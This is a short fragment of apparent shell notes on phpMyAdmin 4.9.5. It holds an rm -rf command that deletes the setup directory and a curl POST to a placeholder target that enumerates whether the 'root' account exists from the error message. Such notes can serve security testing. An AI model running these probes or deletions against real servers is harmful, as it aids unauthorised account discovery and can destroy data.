rm -rf /usr/share/phpmyadmin/setup/
# Testing for user 'root' curl -d "pma_username=root&pma_password=wrong" -X POST http://target.com/phpmyadmin/index.php # Server returns "Access denied for user" -> User EXISTS phpmyadmin 4.9.5 exploit